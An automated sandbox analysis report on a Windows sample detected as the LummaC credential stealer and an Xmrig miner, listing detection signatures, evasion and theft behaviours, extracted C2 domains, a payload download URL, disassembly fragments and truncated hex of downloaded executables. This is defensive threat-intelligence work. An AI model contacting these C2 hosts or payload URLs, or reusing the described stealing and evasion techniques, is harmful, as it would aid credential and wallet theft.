Windows Analysis Report
setupx 1.exe1.exe

Overview

General Information

Sample name: setupx 1.exe1.exe
Analysis ID: 1637273
MD5: d3dfeb11e332ea228567f9f4ebafef51
SHA1: 86ab8368a72f9490c175de5032c2b9f2a219f0ee
SHA256: 79188b44c38f4fabdb8868d0fad3ba1b297b627e8a7d2438fcf7edbaf4c2a6c8
Tags: exeuser-TornadoAV_dev
Infos:

Detection

LummaC Stealer, Xmrig
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected LummaC Stealer
Yara detected Xmrig cryptocurrency miner
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
xmrig According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: setupx 1.exe1.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: LummaC {"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "f4134320f76ad00884e54d36efdebfe68c886445f3e82d0949"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe ReversingLabs: Detection: 81%
Multi AV Scanner detection for submitted file
Source: setupx 1.exe1.exe Virustotal: Detection: 65% Perma Link
Source: setupx 1.exe1.exe ReversingLabs: Detection: 65%
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Sample uses string decryption to hide its real strings
Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp String decryptor: citydisco.bet/gdJIS
Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp String decryptor: featureccus.shop/bdMAn
Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp String decryptor: mrodularmall.top/aNzS
Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp String decryptor: jowinjoinery.icu/bdWUa
Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp String decryptor: legenassedk.top/bdpWO
Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp String decryptor: htardwarehu.icu/Sbdsa
Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp String decryptor: cjlaspcorne.icu/DbIps
Source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp String decryptor: bugildbett.top/bAuz
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_0041BAC1 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData, 2_2_0041BAC1

Bitcoin Miner
barindex
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: 10.2.ZHKYZWVTC38PGAWGZF49K.exe.3078c0d.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: setupx 1.exe1.exe PID: 6848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZHKYZWVTC38PGAWGZF49K.exe PID: 7100, type: MEMORYSTR
Uses 32bit PE files
Source: setupx 1.exe1.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49682 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49684 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49688 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49690 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49691 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49692 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49694 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.8:49699 version: TLS 1.2
Source: setupx 1.exe1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308543577.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.dr
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.10.dr
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CFFCDE FindFirstFileExW, 0_2_00CFFCDE
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 0_2_00CFFD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00CFFD8F
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CFFCDE FindFirstFileExW, 2_2_00CFFCDE
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 2_2_00CFFD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose, 2_2_00CFFD8F
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+4Ch] 2_2_00442800
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx-1AB210DCh] 2_2_0040D830
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-30h] 2_2_004490C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx edi, byte ptr [ebx+ecx] 2_2_0044816C
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then mov dword ptr [esp], eax 2_2_00410993
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+35B9B860h] 2_2_0041BAC1
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax-56B7A16Ch] 2_2_0041BAC1
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx esi, byte ptr [esp+ebp+02h] 2_2_00429460
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then mov word ptr [ecx], dx 2_2_00448CC3
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then lea edi, dword ptr [eax-0000008Ah] 2_2_0044BCE0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then cmp word ptr [edi+ebx], 0000h 2_2_0044AE40
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then push edi 2_2_00411E2A
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax+0Ch] 2_2_00420EA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx ebp, byte ptr [esp+ecx-19B91E8Ah] 2_2_00420EA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], CA198B66h 2_2_00420EA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax+2Ch] 2_2_00420EA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 6D58C181h 2_2_00420EA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h 2_2_00420EA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-42h] 2_2_0042F760
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh] 2_2_0042F760
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then lea ebp, dword ptr [edx+ecx] 2_2_0042F760
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then inc ebx 2_2_00401040
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then mov dword ptr [esp], edx 2_2_0044B840
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx-58D31E9Ah] 2_2_00431850
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then mov eax, ebx 2_2_00424030
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then mov word ptr [eax], dx 2_2_004208F5
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then jmp dword ptr [00451774h] 2_2_0041F888
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then mov word ptr [eax], dx 2_2_00420091
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax-00000088h] 2_2_004288A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h 2_2_004288A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then mov word ptr [eax], cx 2_2_004288A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then mov byte ptr [ecx], al 2_2_0041312E
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then mov word ptr [ecx], si 2_2_004201C3
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] 2_2_0040A1E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] 2_2_0040A1E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx eax, byte ptr [ecx+esi] 2_2_0040B240
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx ecx, byte ptr [esi+eax+25E74604h] 2_2_004112E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 2_2_0042031B
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+454B1CDCh] 2_2_0040D3D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then mov dword ptr [esi+04h], edx 2_2_004113E2
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then push edi 2_2_004313F7
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx edi, byte ptr [esp+eax-099F648Ah] 2_2_0042FB80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movsx edx, byte ptr [esi+eax] 2_2_0041AC10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 8D94E5DFh 2_2_0041ACD0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then cmp dword ptr [edx+ecx*8], 53991D4Eh 2_2_0041ACD0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx esi, byte ptr [esp+edx-041B93BAh] 2_2_0040C4E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then and esi, 80000000h 2_2_0040BC80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then push ebx 2_2_0041FC88
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx edx, byte ptr [esp+ebx+10h] 2_2_0040FCB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then mov dword ptr [esp+18h], ecx 2_2_0041D4B8
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax] 2_2_00444542
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 2_2_0043FD70
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax] 2_2_00446D30
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h] 2_2_00446D30
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax] 2_2_00446D30
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx-00000092h] 2_2_0042FDCC
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-5AE16A62h] 2_2_004485D1
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh] 2_2_0042ED90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh] 2_2_0042ED90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax+4E981752h] 2_2_0041E5BB
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then mov byte ptr [edx], al 2_2_00423612
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 2_2_004336C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+08BA2EA8h] 2_2_004236E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+25E74604h] 2_2_004326FC
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then mov byte ptr [ecx], al 2_2_00437682
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx edi, byte ptr [eax+ecx+61250952h] 2_2_00432E9E
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then push edi 2_2_00431775
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx esi, byte ptr [edx] 2_2_00431FCA
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 2_2_00402780
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+24h] 2_2_0041EF9E
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Code function: 4x nop then movzx edi, byte ptr [esp+eax] 2_2_0043F7B0
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 10_2_054B4668

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: citydisco.bet/gdJIS
Source: Malware configuration extractor URLs: featureccus.shop/bdMAn
Source: Malware configuration extractor URLs: mrodularmall.top/aNzS
Source: Malware configuration extractor URLs: jowinjoinery.icu/bdWUa
Source: Malware configuration extractor URLs: legenassedk.top/bdpWO
Source: Malware configuration extractor URLs: htardwarehu.icu/Sbdsa
Source: Malware configuration extractor URLs: cjlaspcorne.icu/DbIps
Source: Malware configuration extractor URLs: bugildbett.top/bAuz
Connects to a pastebin service (likely for C&C)
Source: unknown DNS query: name: pastebin.com
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:33:56 GMTContent-Type: application/octet-streamContent-Length: 21504Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-5400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a 58 21 9a 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 48 00 00 00 0a 00 00 00 00 00 00 3a 66 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e7 65 00 00 4f 00 00 00 00 80 00 00 b8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 34 65 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 46 00 00 00 20 00 00 00 48 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 06 00 00 00 80 00 00 00 08 00 00 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 66 00 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 36 00 00 dc 2c 00 00 03 00 02 00 10 00 00 06 c4 63 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 b5 00 00 00 01 00 00 11 02 14 7d 1c 00 00 04 02 28 14 00 00 0a 00 00 02 28 06 00 00 06 00 28 05 00 00 06 00 28 03 00 00 06 00 02 28 0b 00 00 06 00 02 28 0a 00 00 06 00 7e 19 00 00 04 72 01 00 00 70 6f 15 00 00 0a 0a 06 2c 30 00 7e 03 00 00 04 7e 12 00 00 04 72 07 00 00 70 16 28 04 00 00 06 00 7e 0f 00 00 04 7e 12 00 00 04 72 23 00 00 70 16 28 04 00 00 06 00 00 2b 18 00 7e 02 00 00 04 7e 12 00 00 04 72 07 00 00 70 16 28 04 00 00 06 00 00 7e 01 00 00 04 7e 12 00 00 04 72 43 00 00 70 16 28 04 00 00 06 00 28 08 00 00 06 00 28 0c 00 00 06 00 02 28 0e 00 00 06 00 2a 00 00 00 13 30 03 00 21 00 00 00 02 00 00 11 00 02 28 16 00 00 0a 0a 06 25 6f 17 00 00 0a 20 80 00 00 00 60 6f 18 00 00 0a 00 06 0b 2b 00 07 2a 00 00 00 1b 30 04 00 a7 01 00 00 03 00 00 11 00 00 20 00 0f 00 00 28 19 00 00 0a 00 20 10 27 00 00 8d 31 00 00 01 0a 16 0b 16 0c 73 1a 00 00 0a 0d 09 7e 10 00 00 04 6f 1b 00 00 0a 13 04 11 04 73 1c 00 00 0a 13 05 00 06 16 72 5b
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:34:03 GMTContent-Type: application/octet-streamContent-Length: 14544Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-38d0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 35 3a 6e fc 71 5b 00 af 71 5b 00 af 71 5b 00 af 71 5b 01 af 7d 5b 00 af 56 9d 7b af 74 5b 00 af 56 9d 7d af 70 5b 00 af 56 9d 6d af 72 5b 00 af 56 9d 71 af 70 5b 00 af 56 9d 7c af 70 5b 00 af 56 9d 78 af 70 5b 00 af 52 69 63 68 71 5b 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c1 26 8b 48 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 0c 00 00 00 0a 00 00 00 00 00 00 08 50 00 00 00 10 00 00 00 00 01 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 06 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 08 19 01 00 01 00 00 00 00 00 04 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 50 00 00 3c 00 00 00 00 60 00 00 c0 03 00 00 00 40 00 00 60 00 00 00 00 1a 00 00 d0 1e 00 00 00 00 00 00 00 00 00 00 70 20 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 06 00 00 00 10 00 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 7c 01 00 00 00 20 00 00 00 02 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 14 01 00 00 00 30 00 00 00 02 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 60 00 00 00 00 40 00 00 00 02 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 22 02 00 00 00 50 00 00 00 04 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e2 2e 72 73 72 63 00 00 00 c0 03 00 00 00 60 00 00 00 04 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:34:03 GMTContent-Type: application/octet-streamContent-Length: 8251392Last-Modified: Wed, 15 Jan 2025 19:13:17 GMTConnection: keep-aliveETag: "678808cd-7de800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 db 63 a2 64 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 10 5f 00 00 d8 7d 00 00 0c 32 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 b0 00 00 10 00 00 4c 7c 7e 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 ae 00 d8 46 00 00 00 40 af 00 e8 5c 00 00 00 10 76 00 9c ee 02 00 00 00 00 00 00 00 00 00 00 a0 af 00 6c 8e 00 00 00 00 00 00 00 00 